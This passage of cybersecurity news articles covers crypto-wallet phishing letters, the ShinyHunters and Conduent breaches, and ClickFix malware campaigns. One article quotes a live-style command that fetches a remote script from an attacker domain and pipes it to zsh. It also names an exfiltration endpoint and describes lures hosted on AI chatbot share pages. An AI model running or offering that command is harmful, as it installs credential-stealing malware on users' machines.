closely, shrinking exchange-traded fund flows along with strained blockchain metrics have together dampened appetite for crypto holdings, deepening the drop seen over recent seven-day periods. This drop marks the toughest stretch for digital currencies since last October, just ahead of Donald Trump securing the presidency amid pro-crypto signals throughout his run.  Not only Bitcoin feels the heat - Ethereum, BNB, Solana, XRP, Dogecoin, Cardano, and Bitcoin Cash all slid 9 to 13 percent in tandem. Sector-wide losses suggest a widespread pullback, not an isolated dip. Despite earlier momentum, confidence now appears fragile across major assets. Besides the plunge, crypto's overall market value now sits near $2.22 trillion. That fall means losses exceeding $2 trillion since the high mark of about $4.39 trillion seen in October 2025, nearly half vanishing within only four weeks. Rather than stabilizing, investor mood has soured due to swings in metals like gold and silver - normally seen as secure - alongside slumping stock markets.  Because of these shifts, appetite for risk-heavy assets has cooled noticeably. Despite weaker US job figures and rising worries over big spending in AI, the cryptocurrency space stays under pressure, says Akshat Siddhant of Mudrex. Because global markets show caution, downward trends hold firm for now. Yet, within this pullback, patient Bitcoin holders might find pockets of value worth watching closely. Though short-term volatility lingers, the broader downturn isn’t seen as a total barrier to strategic entry points. Following such dips carefully could matter more than reacting fast.

Cybercriminals are using traditional mail services to target cryptocurrency users who own hardware wallets manufactured by Trezor and Ledger. The attackers are distributing printed letters that falsely present themselves as official security notifications and attempt to trick recipients into revealing their wallet recovery phrases. The letters instruct users to complete a compulsory “Authentication Check” or “Transaction Check,” claiming this step will soon become mandatory. Recipients are warned that failure to comply before stated deadlines could result in disrupted wallet functionality. One Trezor-themed letter sets February 15, 2026 as the cutoff date, while a Ledger-branded version references October 15, 2025. The correspondence appears professionally formatted and claims to originate from internal security or compliance departments. In a case shared publicly by cybersecurity researcher Dmitry Smilyanets, a Trezor-related letter stated that authentication would soon be enforced across devices and urged users to scan a QR code to prevent interruption of Trezor Suite access. The letter further asserted that even if users had already enabled authentication on their device, they must repeat the process to ensure full activation and synchronization of the feature. The QR codes direct recipients to fraudulent domains including trezor.authentication-check[.]io and ledger.setuptransactioncheck[.]com. At the time of reporting, the Ledger-linked domain was inactive, while the Trezor-related site remained accessible but displayed a phishing warning from Cloudflare. The Trezor-themed phishing page states that users must complete authentication by February 15, 2026 unless they purchased specific models, including Trezor Safe 7, Safe 5, Safe 3, or Safe 1, after November 30, 2025, in which case the feature is allegedly preconfigured. After selecting “Get Started,” users are warned that ignoring the process could lead to blocked access, transaction signing errors, and complications with future updates. Those who continue are prompted to enter their wallet recovery phrase. The form accepts 12-, 20-, or 24-word phrases and claims the information is necessary to confirm device ownership. Technical analysis shows that submitted phrases are transmitted through a backend endpoint located at /black/api/send.php on the phishing domain. With access to the recovery phrase, attackers can restore the wallet on another device and transfer funds. The method used to identify recipients remains unclear. However, both manufacturers have experienced past data breaches that exposed customer contact information, potentially increasing targeting risks. Although email-based crypto phishing is common, physical mail scams remain relatively uncommon. In 2021, attackers mailed tampered Ledger devices designed to capture recovery phrases during setup. A similar postal campaign targeting Ledger users was reported again in April. A recovery phrase, also called a seed phrase, represents the private cryptographic key controlling a cryptocurrency wallet. Anyone who obtains it gains complete control over the associated funds. Legitimate hardware wallet providers do not request recovery phrases through mail, QR codes, websites, or email. The phrase should only be entered directly on the hardware device during a genuine restoration process.

 Hacking group ShinyHunters has reportedly published more than a million records stolen from Harvard University and the University of Pennsylvania (UPenn) on its dark web site, putting a vast trove of sensitive personal data within reach of cybercriminals worldwide. The leaked data appears to contain sensitive details about the students, employees, alumni, donors, and family members of the breached organizations. This has expanded the scope of the compromised data to a wide range of people. Initial verification of the leaked data has revealed that at least some of the leaked data is genuine.  The UPenn breach is believed to have begun in early November 2025, when the hackers gained access to an employee’s single sign-on (SSO) account by claiming to have obtained full access to the UPenn employee’s SSO account. This has essentially turned the SSO account into a master key that has allowed the hackers to access the UPenn VPN system, Salesforce data, the Qlik analytics platform, SAP business intelligence tools, and SharePoint. During the course of the attack, the hackers also used the compromised login credentials to send offensive emails to 700,000 people. Initially, UPenn believed that the emails were fake, but they later turned out to be real. Harvard confirmed a related compromise roughly three weeks after the UPenn disclosure, tying its own incident to a successful voice phishing (vishing) campaign. In this case, attackers are said to have infiltrated Alumni Affairs and Development systems, exposing data on past and present students, donors, some faculty and staff, and even spouses, partners, and parents of alumni and students. The stolen records reportedly include names, dates of birth, home addresses, phone numbers, estimated net worth, donation history, and sensitive demographic attributes such as race, religion, and sexual orientation. Unlike traditional ransomware operations that both encrypt systems and steal data, ShinyHunters appears to have focused solely on data theft and extortion, deploying no encryptors in these campaigns. The group allegedly attempted to negotiate payment in cryptocurrency in exchange for promising to delete the stolen files, following the now-common double extortion model. When talks broke down and the universities did not pay, the hackers responded by dumping the data openly on their dark web leak site, amplifying the risk of identity theft, harassment, and targeted scams for victims. For Harvard and UPenn, the breaches highlight the dangers of over-reliance on SSO accounts and human-centric weaknesses such as vishing, where convincing phone calls trick staff into revealing or approving access. For affected individuals, the publication of highly personal and demographic information raises concerns around fraud, doxxing, discrimination, and reputational harm that could persist for years. The incidents reinforce the need for stronger multifactor authentication, rigorous phishing and vishing awareness training, and tighter controls around high-value institutional accounts holding large volumes of sensitive data.

 Not far from familiar orbits, small satellites labeled as inspectors are starting to raise questions about safety above Earth. Lately, signs point to Russian vehicles moving near critical communication platforms - moves seen as unusually close by many experts. Such actions stir unease across national authorities, military planners, and firms tied to satellite networks worldwide. Little by little, these events reveal a shift: space no longer just a zone of cooperation, but one where watching, listening, and taking position matter more than before.  One way to look at it is through military and spy evaluations: the spacecraft known as Luch-1 and Luch-2 belong to Moscow’s fleet meant for monitoring other orbiting machines. Tracking records show Luch-2, sent up in March 2023, moving unusually close to more than a dozen European satellites. High above Earth - about 36,000 km - the craft operates within an orbital belt where units stay locked over one spot on the ground.  High above Earth, geostationary orbit holds unique importance. Satellites here handle telecom signals, national defense networks, TV broadcasts, storm tracking, along with classified government links. Since each craft stays fixed above one spot on the planet, services remain constant across time zones and emergencies alike. Should an unknown satellite shift close without warning, such movement draws immediate attention from control centers worldwide.  Security experts in Europe suspect the Luch satellites could be tapping into transmissions from several regional communication platforms. Radio links, tightly aimed between Earth terminals and orbiting craft, carry these exchanges. Sitting close to those pathways - either incoming or outgoing - a satellite might pick up what is sent, particularly when protective coding is weak or old. Gathering such information counts as signal surveillance, known as SIGINT; doing so from space offers ongoing reach into critical traffic streams.  Worry isn’t limited to public infrastructure alone. Some of these orbiting platforms were said to serve private businesses alongside national agencies, backing up operations like those run by Intelsat. Because they fulfill civilian and strategic roles, their vulnerability grows - today’s armed forces lean on commercial space links for communication channels, moving information, and reaching remote computing resources. When such networks face interference, consequences may ripple through military planning, disaster reaction setups, air traffic messaging, or the synchronization of banking transfers.  Not just monitoring, but deliberate meddling raises concern among authorities. Close-orbiting satellites might, under certain conditions, disrupt communications through signal manipulation or noise flooding. Even without crashes in space, proven precision in approaching vital infrastructure alters strategic calculations globally. Repeated incidents targeting British military satellite links confirm combat now extends beyond ground-based systems.  Though updated models now include defenses like shifting signal frequencies, smart antenna adjustments, or improved data coding, security levels differ - especially on legacy commercial units still active. While some agencies and companies pour resources into monitoring tools for orbital activity, spotting odd patterns as they happen remains a priority. Older hardware often lags behind when it comes to resilience against modern threats.  Nowadays, dependence on space technology keeps growing - so does the link between orbit safety and digital protection. Because global guidelines for close-up satellite activities remain sparse, maneuvers by inspection craft push demands for better rules. These safeguards aim to shield vital networks running everyday online functions. What happens above affects what happens below.

  Cybersecurity experts have uncovered a new incident in which an information-stealing malware successfully extracted sensitive configuration data from OpenClaw, an AI agent platform previously known as Clawdbot and Moltbot. The breach signals a notable expansion in the capabilities of infostealers, now extending beyond traditional credential theft into artificial intelligence environments. "This finding marks a significant milestone in the evolution of infostealer behavior: the transition from stealing browser credentials to harvesting the 'souls' and identities of personal AI [artificial intelligence] agents," Hudson Rock said. According to Alon Gal, CTO of Hudson Rock, the malware involved is likely a variant of Vidar, a commercially available information stealer that has been active since late 2018. He shared the details in a statement to The Hacker News. Investigators clarified that the data theft was not carried out using a specialized OpenClaw-focused module. Instead, the malware leveraged a broad file-harvesting mechanism designed to search for sensitive file extensions and directory paths. Among the compromised files were: * openclaw.json – Containing the OpenClaw gateway authentication token, a redacted email address, and the user’s workspace path. * device.json – Storing cryptographic keys used for secure pairing and digital signing within the OpenClaw ecosystem. * soul.md – Documenting the AI agent’s operational philosophy, behavioral parameters, and ethical guidelines. Security researchers warned that stealing the gateway token could enable attackers to remotely access a victim’s local OpenClaw instance if exposed online, or impersonate the client in authenticated gateway interactions. "While the malware may have been looking for standard 'secrets,' it inadvertently struck gold by capturing the entire operational context of the user's AI assistant," Hudson Rock added. "As AI agents like OpenClaw become more integrated into professional workflows, infostealer developers will likely release dedicated modules specifically designed to decrypt and parse these files, much like they do for Chrome or Telegram today." The disclosure follows mounting scrutiny over OpenClaw’s security posture. The platform’s maintainers recently announced a collaboration with VirusTotal to examine potentially malicious skills uploaded to ClawHub, strengthen its threat model, and introduce misconfiguration auditing tools. Last week, the OpenSourceMalware research team reported an active ClawHub campaign that bypasses VirusTotal detection. Instead of embedding malicious payloads directly within SKILL.md files, threat actors are hosting malware on imitation OpenClaw websites and using the skills as decoys. "The shift from embedded payloads to external malware hosting shows threat actors adapting to detection capabilities," security researcher Paul McCarty said. "As AI skill registries grow, they become increasingly attractive targets for supply chain attacks." Another concern raised by OX Security involves Moltbook, a Reddit-style forum built specifically for AI agents operating on OpenClaw. Researchers found that AI agent accounts created on Moltbook cannot currently be deleted, leaving users without a clear method to remove associated data. Meanwhile, the STRIKE Threat Intelligence team at SecurityScorecard identified hundreds of thousands of publicly exposed OpenClaw instances, potentially opening the door to remote code execution (RCE) attacks. "RCE vulnerabilities allow an attacker to send a malicious request to a service and execute arbitrary code on the underlying system," the cybersecurity company said. "When OpenClaw runs with permissions to email, APIs, cloud services, or internal resources, an RCE vulnerability can become a pivot point. A bad actor does not need to break into multiple systems. They need one exposed service that already has authority to act." Since its launch in November 2025, OpenClaw has experienced rapid adoption, amassing more than 200,000 stars on GitHub. On February 15, 2026, Sam Altman announced that OpenClaw founder Peter Steinberger would be joining OpenAI, stating, "OpenClaw will live in a foundation as an open source project that OpenAI will continue to support."

  Luxury retail is a rarefied industry where reputations travel faster than seasonal collections. Canada Goose, a brand associated with Arctic-quality craftsmanship and premium exclusivity, is now facing scrutiny from an unexpected part of the internet.  In a cyber incident that the outerwear company insists did not originate within its walls, a cache of customer transaction data has appeared on a notorious ransomware leak site, putting the company at the center of the cyber incident that appears to have originated from a cache of customer transaction information. It has been reported that hackers have compromised Canada Goose's internal systems, but the luxury clothing brand maintains that its systems have not been compromised.  On ShinyHunters' data leak portal, Canada Goose has been listed as having had 600,000 customer records exfiltrated by the notorious ransomware collective ShinyHunters. This dataset, which is approximately 1.67 gigabytes in size, contains detailed information regarding e-commerce orders, such as customer names, addresses, telephone numbers, and credit card numbers.  It is the company's preliminary assessment that the exposed information relates to historical customer transactions, and no evidence indicates a breach of Canada Goose's corporate network has yet to be discovered. In response to the company's statements, it is actively reviewing the authenticity, origin, and scope of the dataset and will take appropriate measures if any potential risks to customers arise.  There are partial details in the leaked records, including payment card brand names, the final four digits of card numbers, and in some cases, the first six digits of the issuing bank's name. Among the additional data in the dataset are payment authorization metadata, order histories, device and browser information, and transaction values. Despite the absence of full credit card numbers, cybersecurity experts warn that even partial financial and transactional information can be manipulated to facilitate targeted scams, social engineering attacks, and fraud schemes. As part of its public denial, ShinyHunters has not indicated that the Canada Goose dataset is connected with recent social engineering campaigns targeted at single sign-on environments and cloud infrastructures. In its claim, the group asserts that the records are a result of a breach of the payment processor in August 2025, a claim which has not been independently verified. According to the structure of the leaked data, it may have been derived from a hosted storefront or external payment processing platform, a fact that may support the group's assertion. ShinyHunters has established itself as a company that penetrates e-commerce ecosystems, SaaS platforms, and cloud-hosted services, obtaining and publishing large quantities of consumer data in order to exert additional pressure on these companies. As described in threat intelligence assessments, ShinyHunters are an established data extortion operation with a history of obtaining and publicizing significant amounts of customer information from leading brands and online platforms. Since the early 2010s, the group has been associated with a number of high-profile intrusions that frequently target e-commerce ecosystems, software as a service providers, and cloud environments where large datasets can be aggregated and monetized.  A number of security researchers have also linked the collective with voice phishing and other social-engineering techniques aimed at compromising corporate credentials and shifting into cloud-based systems. In accordance with established patterns, stolen data is typically leveraged for financial coercion, sold on underground marketplaces, or published publicly on the leak portal of the group when ransom demands have not been met.  Currently, it is not possible to determine whether Canada Goose has impacted customers in the exact manner described above. The company has stated it is examining the dataset to determine its authenticity, origin, and breadth before making a determination regarding whether customer notifications will be necessary. There is a report that the exposed records contain partial payment card information, including the brand name of the card, the final four digits of the card number, and the ISIN number of the issuing bank, as well as details regarding the payment authorization.  Cybersecurity professionals note that, even if full primary account numbers are not presented, truncated financial information, when combined with names, contact information, and transaction histories, can materially increase the success rate of targeted phishing schemes, credential harvesting schemes, and fraud schemes. In addition to purchase histories, order values, and device and browser metadata, the dataset contains transaction information as well. Using such contextual information may allow adversaries to identify high spenders and develop convincing, transaction specific lures that mimic legitimate post-purchase correspondences. Despite the lack of complete payment card details, the level of granularity increases downstream risk. Separately, ShinyHunters has recently been linked by independent researchers to a series of social engineering campaigns aimed at compromising single-sign-on environments and cloud accounts through social engineering. According to the group, when questioned whether there was a correlation between those operations and the Canada Goose data, they denied such a connection, stating that the records were a consequence of a breach at a third-party payment processor dating back to August 2025. This assertion has not been independently verified.  There is an apparent similarity between the structure of the leaked files including field labels such as checkout identifiers, shipping line entries, cart tokens, and cancellation metadata and export schemas that are typically generated by hosted storefronts and payment processing platforms. Although this does not establish the provenance of the data definitively, it indicates that the data may have originated within the environment of an external service provider rather than from a direct compromise of the retailer’s internal systems.  It is evident that the incident underscores a broader reality facing retailers operating in increasingly interconnected digital supply chains. While core systems may remain unchanged, exposure risks may arise from third-party integrations which handle payments, order processing, and customer data storage.  It has been observed by industry analysts that organizations that utilize external commerce and payment infrastructure must conduct rigorous vendor risk assessments, monitor their vendors continuously, and coordinate incident response procedures to limit downstream exposure.  Customers are advised to maintain increased vigilance against unsolicited communications that reference past purchases or payment activity until the scope of the data is conclusively understood.  A key takeaway from this episode is that data stewardship goes far beyond corporate boundaries, and resilience relies on ecosystem oversight as much as internal security protocols.

  A fresh wave of U.S.-based investment firms has joined an ongoing legal confrontation with the government of South Korea over its handling of a large scale cybersecurity incident involving Coupang. On February 11, it was confirmed that three additional investors, Abrams Capital, Durable Capital Partners, and Foxhaven Asset Management, have formally moved to participate in arbitration proceedings. These firms are aligning with Greenoaks Capital and Altimeter Capital, which had already initiated legal action. By filing official notices, the new claimants are adopting and supporting the earlier case rather than launching a separate one. At the center of the dispute is an allegation that South Korean authorities unfairly targeted Coupang and, by extension, other U.S.-linked businesses operating in the country. The investors claim that Seoul’s regulatory response following a large-scale consumer data breach amounted to discriminatory treatment that caused severe financial harm. The controversy traces back to a disclosure made in November, when Coupang announced that personal information belonging to roughly 33 million customers in South Korea had been exposed in a cyber incident. Data breaches of this scale typically involve unauthorized access to customer records, which may include names, contact information, and other identifying details. The announcement triggered widespread public concern, political scrutiny, legal complaints, and cross-border tensions. According to the investors pursuing arbitration, the government’s actions after the breach significantly affected shareholder value, resulting in losses amounting to billions of dollars. They argue that the regulatory measures taken were disproportionate and damaged investor confidence. In addition to arbitration efforts, the newly joined investors have sent letters supporting calls for a formal review by U.S. authorities into South Korea’s conduct. Neil Mehta, founder and managing partner of Greenoaks Capital, stated that American policymakers and investors increasingly view the case as an example of the need to defend U.S. companies against what they see as unfair foreign government actions. Coupang was established in 2010 by Korean-American entrepreneur Bom Kim, a graduate of Harvard University. Over the past decade, it has become the most widely used e-commerce platform in South Korea, surpassing long-established domestic conglomerates such as Shinsegae in online retail presence. The company has expanded beyond traditional online shopping into food delivery services, streaming platforms, and financial technology offerings, further strengthening its footprint in the country’s digital economy. South Korea’s Justice Ministry has confirmed receipt of additional notices signaling intent to arbitrate. In an official statement, the ministry said it would respond in a systematic and professional manner through its International Investment Dispute Response Team, indicating that the government intends to formally defend its position. The issue has also contributed to rising trade friction between Washington and Seoul. U.S. President Donald Trump has warned that tariffs on South Korean goods could increase to as much as 25 percent amid broader economic tensions. Separately, the United States House Committee on the Judiciary recently issued a subpoena to Coupang as part of an ongoing investigation examining alleged discriminatory treatment of American companies operating abroad. As arbitration proceedings advance, the case is expected to test not only corporate accountability in the wake of major data breaches, but also the strength of international investment protections and the diplomatic balance between two long-standing economic partners.

  Microsoft has revealed a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing commands that initiate a Domain Name System (DNS) lookup to fetch a secondary malicious payload. In this updated approach, threat actors use the “nslookup” command—short for nameserver lookup—triggered through the Windows Run dialog. The command performs a custom DNS query that retrieves instructions for the next stage of the attack. ClickFix has gained traction in recent years and is commonly distributed through phishing emails, malvertising campaigns, and drive-by download schemes. Victims are typically redirected to fraudulent landing pages featuring fake CAPTCHA checks or fabricated system alerts, urging them to run commands in the Windows Run dialog or the macOS Terminal app to “resolve” non-existent issues. The technique has spread rapidly over the past two years because it relies on users unknowingly infecting their own systems, effectively bypassing traditional security safeguards. Its success has led to multiple offshoots, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix. "In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver," the Microsoft Threat Intelligence team said in a series of posts on X. "The output is filtered to extract the Name: DNS response, which is executed as the second-stage payload." Microsoft explained that this variation uses DNS as a “lightweight staging or signaling channel,” allowing attackers to communicate with their infrastructure while introducing an additional validation layer before delivering the next payload. "Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic," the Windows maker added. Following the DNS lookup, the attack chain downloads a ZIP archive from an external server (“azwsappdev[.]com”). Inside is a malicious Python script that conducts system reconnaissance, executes discovery commands, and drops a Visual Basic Script (VBScript). That VBScript launches ModeloRAT—a Python-based remote access trojan previously linked to CrashFix campaigns. To maintain persistence, the malware creates a Windows shortcut (LNK) file in the Startup folder, ensuring automatic execution whenever the system reboots. Lumma Stealer and CastleLoader Activity Intensifies Separately, Bitdefender has reported a spike in Lumma Stealer operations, fueled by ClickFix-style fake CAPTCHA campaigns. These attacks deploy an AutoIt-based version of CastleLoader, a loader attributed to a threat actor known as GrayBravo (formerly TAG-150). CastleLoader checks for virtualization environments and certain security software before decrypting and executing the stealer in memory. Beyond ClickFix tactics, attackers are also using websites offering cracked software and pirated movies to lure victims into downloading malicious installers disguised as MP4 files. Additional campaigns have delivered a counterfeit NSIS installer that runs obfuscated VBA scripts before launching AutoIt components responsible for loading Lumma Stealer. The VBA component establishes scheduled tasks to ensure persistence. "Despite significant law enforcement disruption efforts in 2025, Lumma Stealer operations continued, demonstrating resilience by rapidly migrating to new hosting providers and adapting alternative loaders and delivery techniques," the Romanian cybersecurity company said. "At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread through delivery chains." One domain tied to CastleLoader infrastructure (“testdomain123123[.]shop”) was also identified as a Lumma Stealer command-and-control (C2) server, suggesting possible collaboration or shared services between operators. India has recorded the highest number of Lumma infections, followed by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada. "The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities," Bitdefender said. "The instructions resemble troubleshooting steps or verification workarounds that users may have encountered previously. As a result, victims often fail to recognize that they are manually executing arbitrary code on their own system." Expanding Threat Landscape: RenEngine, macOS Stealers, and Malvertising CastleLoader is not the only distribution mechanism in play. Since March 2025, campaigns using RenEngine Loader have spread Lumma Stealer through fake game cheats and pirated applications such as CorelDRAW. In these cases, RenEngine deploys Hijack Loader, which then installs the stealer. Kaspersky data shows primary impact in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France. Meanwhile, macOS users are increasingly being targeted. A campaign leveraging phishing and malvertising techniques has distributed Odyssey Stealer—a rebranded version of Poseidon Stealer and a fork of Atomic macOS Stealer (AMOS). The malware steals credentials and cryptocurrency wallet data from over 200 browser wallet extensions and multiple desktop wallet apps. "Beyond credential theft, Odyssey operates as a full remote access trojan," Censys said. "A persistent LaunchDaemon polls the C2 every 60 seconds for commands, supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines." Other campaigns include: * Fake CAPTCHA pages on compromised websites tricking Windows users into running PowerShell commands that deploy StealC. * Email phishing attacks using malicious SVG files inside password-protected ZIP archives to deliver the open-source .NET stealer Stealerium. * Abuse of generative AI platforms such as Claude to host ClickFix instructions distributed via sponsored Google search results. * Fake Medium articles impersonating Apple’s Support Team to spread macOS stealers via domains like “raxelpak[.]com.” "The C2 domain raxelpak[.]com has URL history going back to 2021, when it appeared to host a safety workwear e-commerce site," MacPaw's Moonlock Lab said. "Whether the domain was hijacked or simply expired and re-registered by the [threat actor] is unclear, but it fits the broader pattern of leveraging aged domains with existing reputation to avoid detection." Malvertising abuse has also raised concerns. "The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted site," AdGuard said. "Clicking the ad leads to a real Claude page, not a phishing copy. The consequence is clear: Google Ads + a well-known trusted platform + technical users with high downstream impact = a potent malware distribution vector." macOS Threats on the Rise Security researchers note a broader shift toward targeting Apple systems with advanced infostealers. According to recent analysis, macOS stealers now target more than 100 Chrome cryptocurrency extensions, and attackers are even acquiring legitimate Apple developer signatures to bypass Gatekeeper protections. "Nearly every macOS stealer prioritizes cryptocurrency theft above all else," the company said. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse." "The 'Macs don't get viruses' assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage."

 A major data breach at business services provider Conduent has spiraled into a large-scale security incident affecting at least 25 million people across the United States, with Volvo Group North America among the latest victims. The breach, originally disclosed in early 2025, is now understood to be far more extensive than first reported, impacting residents in multiple states and exposing sensitive personal data. Texas authorities now estimate that 15 million people have been affected, up from an initial 4 million, while more than 10 million individuals in Oregon have also been caught up in the incident. Conduent first confirmed in November 2025 that a cyberattack in January 2025 had exposed personal data belonging to over 10 million people. The compromised information included names, addresses, dates of birth, Social Security numbers, and health and insurance details, making it highly valuable for identity theft and fraud. Earlier, in April 2025, the company had revealed that attackers stole names and Social Security numbers during the same January intrusion, highlighting a pattern of gradually escalating disclosures as the scale of the breach became clearer. Operational disruption accompanied the data exposure, as Conduent disclosed that a January cyberattack caused service outages impacting agencies in multiple U.S. states. Wisconsin and Oklahoma reported issues affecting payments and customer support, underscoring how attacks on back-office providers can cascade into interruptions of public services. Subsequent investigation determined that hackers had maintained access to Conduent’s network from October 21, 2024, to January 13, 2025, giving them ample time to exfiltrate personal data, including Social Security numbers, dates of birth, addresses, and health-related information. The Safepay ransomware group later claimed responsibility for the attack in February 2025, adding an extortion dimension to the incident. Conduent, which offers printing and mailroom services, document processing, payment integrity, and other back-office support, has been sending breach notifications on behalf of affected clients, including Volvo Group North America. According to a filing with the Maine Attorney General, Volvo reported that 16,991 employees were impacted, and the company said it only learned of the incident in January 2026, many months after the original intrusion window. In its notification letters, Conduent informed individuals that some of their personal information may have been involved due to services provided to their current or former health plans. The company stated it is not aware of any attempted or actual misuse of the compromised data but is urging recipients to consider steps to protect themselves. As part of its response, Conduent is offering free identity protection services to those affected, reflecting ongoing concern about long-term risks posed by the theft of such highly sensitive information.

 One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "HomeBrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight.  Beginning with public posts shaped by Anthropic’s AI, a Claude artifact emerges when someone shares output from the system online. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code - open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, directions appear telling them to insert command-line strings straight into Terminal. Though it feels harmless at first glance, that single step triggers the start of compromise.  The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details.  One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.   This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.

  According to Microsoft, the ClickFix social engineering technique has evolved in a refined manner, emphasizing that even the most common software applications can be repurposed into covert channels for malware distribution. Using this latest iteration, hackers are no longer only relying on deceptive downloads and embedded scripts to spread malware.  Through carefully staged prompts, they manipulate victims' trust by instructing them to execute what appears to be harmless system commands. Under this veneer of legitimacy, the command initiates a DNS query via nslookup, quietly retrieving the next-stage payload from attacker-controlled infrastructure.  By embedding malicious intent within routine administrative behaviors, the campaign transforms a standard troubleshooting tool into an unassuming channel of infection. In Microsoft's analysis, the newly observed campaign instructs victims to use an nslookup command to query a DNS server controlled by the attacker, rather than the system's configured resolver, as directed by the attacker.  It is designed to request a specific hostname from a remote IP address controlled by the threat actor and forward the query to that address. Instead of returning a regular DNS record, the server responds with a crafted DNS entry with a second PowerShell command embedded in the "Name" field.  In addition, the Windows command interpreter parses and executes that response, thereby converting a standard DNS query into a covert staging mechanism for code delivery. According to Microsoft Threat Intelligence, this strategy represents another evolution of ClickFix's evasion strategy.  While earlier versions primarily utilized HTTP-based payload retrieval, this version relies on DNS for both communication and dynamic payload distribution. In spite of the unclear lure used to persuade users, victims are reportedly instructed to execute the command through Windows Run, strengthening the tactic's dependency on social engineering rather than exploits.  By moving execution to user-initiated system utilities, attackers are reducing the probability that conventional web or network filtering controls will be triggered. PowerShell scripts that are executed in this stage retrieve additional components from infrastructure under attacker control.  As a result of Microsoft's investigation, it has been determined that the subsequent payload consists of a compressed archive containing a portable Python runtime along with malicious scripts. Prior to establishing persistence on the infected host, these scripts conduct reconnaissance against the host and its domain environment, gathering network and system information.  In this method, the user creates a VBScript file in their AppData directory, and a shortcut is placed in their Windows Startup folder to ensure execution upon logon. A remote access trojan named ModeloRAT is deployed as part of the infection chain, granting the operator sustained control over compromised systems. A DNS-based staging strategy allows adversaries to adjust payloads in real time while blending malicious traffic with routine name resolution activity by embedding executable instructions within DNS responses. As well as complicating detection, this DNS-based staging technique demonstrates that ClickFix continues to refine itself into a modular intrusion framework that is adaptable.  In addition, Microsoft's Threat Intelligence team has assessed that the intrusion sequence is initiated by launching a command from the Windows Run dialog, which directly directs a DNS query to an adversary-controlled hard-coded external resolver. This command output is programmatically filtered to isolate the Name: field of the DNS response, and it is then executed as the second stage payload. There has been documentation of this technique being used in multiple malware distribution campaigns, including campaigns that deliver Lumma Stealer. This malware has been detected in India, France, the United States, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.  Attributed to the GrayBravo threat actor, Lumma Stealer incorporates environmental awareness checks, identifying virtualization platforms and specific security products before decrypting and executing its payload directly in memory to evade analysis and detection.  Rather than relying on phishing emails, malvertising networks, and drive-by download schemes, ClickFix has evolved beyond its earlier reliance on these methods to move toward DNS-based staging. By exploiting procedural trust rather than software flaws, operators persuade users to execute commands to resolve benign system problems.  A parallel campaign distributing Lumma Stealer used CastleLoader and RenEngine Loader as primary delivery mechanisms. CastleLoader has been deployed by compromised websites that present fraudulent CAPTCHA verification prompts instructing victims to use PowerShell.  In campaigns targeting Russian, Brazilian, Turkish, Spanish, German, Mexico, Algeria, Egypt, Italy, and France users, RenEngine Loader facilitates the deployment of Hijack Loader, which eventually installs Lumma Stealer on compromised hosts. These campaigns do not have limited operational footprints to Windows environments. The evidence suggests that macOS-targeted infostealer activity has increased dramatically in recent years, which indicates that long-held assumptions about Apple platform immunity have been eroded. In order to capitalize on the concentration of high-value software wallets within the macOS ecosystem, attackers frequently prioritize cryptocurrency theft.  There are numerous tactics, techniques, and procedures that macOS-specific detection strategies must consider, including unsigned applications requesting elevated credentials, anomalous Terminal execution patterns, suspicious outbound connections to blockchain infrastructure that are unrelated to financial workflows, as well as attempts to exfiltrate data from Keychain repositories and browser storage media.  In addition to ClickFix itself, many other variants and affiliate campaigns have been launched. Security analysts have documented macOS-focused operations utilizing phishing and malvertising to distribute Odyssey Stealer, a rebranded version of Poseidon Stealer. Using compromised websites that appear legitimate, attackers have hosted deceptive CAPTCHA pages that trigger the deployment of StealC 